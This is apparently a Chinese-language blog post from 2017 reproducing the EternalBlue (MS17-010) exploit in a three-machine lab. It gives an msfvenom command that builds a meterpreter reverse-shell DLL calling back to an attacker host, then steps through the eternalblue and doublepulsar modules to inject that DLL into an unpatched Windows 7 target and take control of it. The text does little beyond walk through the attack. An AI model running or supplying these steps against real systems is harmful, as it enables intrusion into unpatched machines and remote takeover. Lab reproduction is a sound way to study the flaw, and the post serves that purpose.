永恒之藍漏洞利用復現
阿新 • • 發佈:2017-08-12
成功 .cn 旗艦 nal blue ima 選擇執行 win 環境搭建
一、環境搭建:
IP地址 | 系統信息 | 備註 | 角色 |
192.168.0.244 | win7旗艦版(未安裝MS17-010補丁版本) | 需開啟445端口及SMB協議 | 靶機 |
192.168.0.105 | win7旗艦版 | 需安裝python2.6.6&pywin32 | 攻擊機 |
192.168.0.245 | kali linux 2.0 | 生成reverse shell的dll文件 | 輔助機 |
二、攻擊流程:
攻擊流程圖解:
1.在kali linux中利用metasploit生成用於建立反向鏈接的dll文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.245 LPORT=4444 -f dll > reverse.dll
2.打開metasploit
3.建立監聽
4.在Windows 7下,運行fb.py工具
5.指定攻擊目標
6.指定攻擊目標後,輸入:use eternalblue,使用永恒之藍漏洞
7.一路確認輸入的信息,知道選擇攻擊工具,選擇fb模塊
8.再次確認攻擊目標,之後輸入:use doublepulsar
9.選擇要攻擊的服務
10.一路按確定鍵,直到進入選擇執行動作這一步驟
11.在選擇攻擊動作之前將步驟1中生成的reverse.dll文件放置在攻擊機的c盤下
12.選擇2,將步驟1中生成的reverse.dll文件註入到靶機
13.成功註入
此時,攻擊機獲得靶機根權限,可以在攻擊機上執行靶機的shell 命令,查看靶機文件。
永恒之藍漏洞利用復現